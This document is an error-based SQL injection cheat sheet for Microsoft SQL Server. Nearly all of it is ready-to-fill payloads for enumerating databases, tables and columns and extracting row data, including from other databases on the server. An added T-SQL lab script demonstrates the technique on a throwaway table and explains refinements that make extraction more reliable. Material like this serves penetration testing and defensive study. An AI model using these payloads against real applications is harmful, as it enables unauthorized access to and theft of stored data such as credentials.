Error-Based SQLi – Method 1

Current DB Enumeration

Enumerate number of databases
1 AND 1=CONVERT(INT,(CHAR(58)+CHAR(58)+(SELECT top 1 CAST(COUNT([name]) AS nvarchar(4000)) FROM [master]..[sysdatabases] )+CHAR(58)+CHAR(58)))--
Extract database name by number - Method 1
1 AND 1=CONVERT(INT,db_name(<database_#>))--
  • <database_#>
Extract database name by number - Method 2
1 AND 1=CONVERT(INT,(SELECT CAST(name AS nvarchar(4000)) FROM master..sysdatabases WHERE dbid=<database_#>))--
  • <database_#>
Extract table count from current DB (information_schema.TABLES counts views as well as base tables)
1 AND 1=CONVERT(INT,(CHAR(58)+CHAR(58)+(SELECT top 1 CAST(COUNT(*) AS nvarchar(4000)) FROM information_schema.TABLES )+CHAR(58)+CHAR(58)))--
Extract table names from current DB
1 AND 1= CONVERT(INT,(CHAR(58)+(SELECT DISTINCT top 1 TABLE_NAME FROM (SELECT DISTINCT top <increase_#_starting_with_1> TABLE_NAME FROM information_schema.TABLES ORDER BY TABLE_NAME ASC) sq ORDER BY TABLE_NAME DESC)+CHAR(58)))--
  • <increase_#_starting_with_1>
Extract column names from a table in current DB
1 AND 1=CONVERT(INT,(CHAR(58)+(SELECT DISTINCT top 1 column_name FROM (SELECT DISTINCT top <increase_#_starting_with_1> column_name FROM information_schema.COLUMNS WHERE TABLE_NAME='<table_name>' ORDER BY column_name ASC) sq ORDER BY column_name DESC)+CHAR(58)))--
  • <increase_#_starting_with_1>
  • <table_name>
Extract number of rows in a table in current DB
1 AND 1=CONVERT(INT,(CHAR(58)+CHAR(58)+(SELECT top 1 CAST(COUNT(*) AS nvarchar(4000)) FROM <table_name>)+CHAR(58)+CHAR(58)))--
  • <table_name>
Extract data for two columns by row #
1 AND 1=CONVERT(INT,(CHAR(58)+CHAR(58)+(SELECT top 1 <column_1>+CHAR(58)+<column_2> FROM (SELECT top <increase_#_starting_with_1> <column_1> , <column_2> FROM <table_1> ORDER BY <column_1> ASC) sq ORDER BY <column_1> DESC)+CHAR(58)+CHAR(58)))--
  • <column_1>
  • <column_2>
  • <increase_#_starting_with_1>
  • <table_1>

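All of the payloads above rely on the same two tricks: CONVERT(INT, ...) fails on any non-numeric string and the SQL Server error message echoes the offending value, and the CHAR(58) delimiters (':') guarantee the string is never numeric, so even a bare count like 3 leaks instead of converting cleanly. Row N is isolated with "TOP N ascending, then TOP 1 of that descending". The T-SQL lab script below is an added example, not part of the original cheat sheet; it builds a throwaway table and walks it the way the row-number payloads do, so you can see what each step's error message carries. It assumes SQL Server 2008 or later; the table dbo.users_demo and its rows are constructed for the example.

```sql
-- Added lab script (not from the original cheat sheet). Run in a scratch
-- database on SQL Server 2008+ to watch the error-based technique work.
SET NOCOUNT ON;

-- Constructed sample data: one NULL and one integer column on purpose.
CREATE TABLE dbo.users_demo (username nvarchar(64), pass nvarchar(64), login_count int);
INSERT INTO dbo.users_demo VALUES
    (N'admin', N's3cret',  12),
    (N'bob',   NULL,        0),
    (N'carol', N'hunter2',  3);

-- 1. Why the '::' delimiters matter: CONVERT(INT, N'3') would succeed and leak
--    nothing, but CONVERT(INT, N'::3::') fails and the message carries the value.
BEGIN TRY
    SELECT CONVERT(INT, CHAR(58)+CHAR(58)
        +(SELECT CAST(COUNT(*) AS nvarchar(4000)) FROM dbo.users_demo)
        +CHAR(58)+CHAR(58));
END TRY
BEGIN CATCH
    -- Conversion failed when converting the nvarchar value '::3::' to data type int.
    PRINT ERROR_MESSAGE();
END CATCH;

-- 2. Row-by-row extraction with the nested TOP idiom. Two hardening details
--    the bare payloads on this page do not include:
--      * ISNULL() on nullable columns: a NULL anywhere in the concatenation
--        makes the whole string NULL, CONVERT(INT, NULL) is NULL, no error
--        fires, and the row silently looks as if it did not exist.
--      * CAST() on non-string columns: 'x' + 12 would try to convert 'x' to
--        int and fail before your delimited string is ever built.
DECLARE @n int = 1, @sql nvarchar(max);
WHILE @n <= 4
BEGIN
    SET @sql = N'SELECT CONVERT(INT,(CHAR(58)+CHAR(58)+(SELECT top 1 '
        + N'username+CHAR(58)+ISNULL(pass,N''<NULL>'')+CHAR(58)+CAST(login_count AS nvarchar(4000)) '
        + N'FROM (SELECT top ' + CAST(@n AS nvarchar(10))
        + N' username, pass, login_count FROM dbo.users_demo ORDER BY username ASC) sq '
        + N'ORDER BY username DESC)+CHAR(58)+CHAR(58)))';
    BEGIN TRY
        EXEC sp_executesql @sql;
        PRINT 'row ' + CAST(@n AS varchar(10)) + ': no error raised';
    END TRY
    BEGIN CATCH
        PRINT 'row ' + CAST(@n AS varchar(10)) + ': ' + ERROR_MESSAGE();
    END CATCH;
    SET @n += 1;
END;
-- Expected values inside the four messages, in order:
--   ::admin:s3cret:12::   ::bob:<NULL>:0::   ::carol:hunter2:3::   ::carol:hunter2:3::
-- Note the fourth: TOP 4 over a 3-row table still returns 3 rows, so once N
-- exceeds the row count the LAST row repeats rather than returning NULL.
-- That is why the sheet extracts COUNT(*) first; stop at that number (or when
-- a value repeats), not on "no error".

DROP TABLE dbo.users_demo;
```

In a real injection the same SELECT sits after the application's own `WHERE id = 1 AND 1=...`, and `--` comments out whatever the application appends. The ORDER BY column must be one with distinct values, otherwise "TOP N ASC then TOP 1 DESC" can return the same row for several N; the DISTINCT in the table- and column-name payloads above serves the same purpose for information_schema, which lists a table once per column.
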
Other DB Enumeration

Extract tables from other DB
1 AND 1=CONVERT(INT,(CHAR(58)+(SELECT DISTINCT top 1 TABLE_NAME FROM (SELECT DISTINCT top <increase_#_starting_with_1> TABLE_NAME FROM <other_db_name>.information_schema.TABLES ORDER BY TABLE_NAME ASC) sq ORDER BY TABLE_NAME DESC)+CHAR(58)))--
  • <increase_#_starting_with_1>
  • <other_db_name>
Enumerate columns from table from other DB
1 AND 1=CONVERT(INT,(CHAR(58)+(SELECT DISTINCT top 1 column_name FROM (SELECT DISTINCT top <increase_#_starting_with_1> column_name FROM <database>.information_schema.COLUMNS WHERE TABLE_NAME='<table>' ORDER BY column_name ASC) sq ORDER BY column_name DESC)+CHAR(58)))--
  • <increase_#_starting_with_1>
  • <database>
  • <table>
Extract number of rows in table from other DB
1 AND 1=CONVERT(INT,(CHAR(58)+CHAR(58)+(SELECT top 1 CAST(COUNT(*) AS nvarchar(4000)) FROM [<database>]..[<table>] )+CHAR(58)+CHAR(58)))--
  • <database>
  • <table>
Extract data from table in other DB
1 AND 1=CONVERT(INT,(CHAR(58)+CHAR(58)+(SELECT top 1 <column> FROM (SELECT top <increase_#_starting_with_1> <column> FROM <database>..<table> ORDER BY <column> ASC) sq ORDER BY <column> DESC)+CHAR(58)+CHAR(58)))--
  • <increase_#_starting_with_1>
  • <column>
  • <database>
  • <table>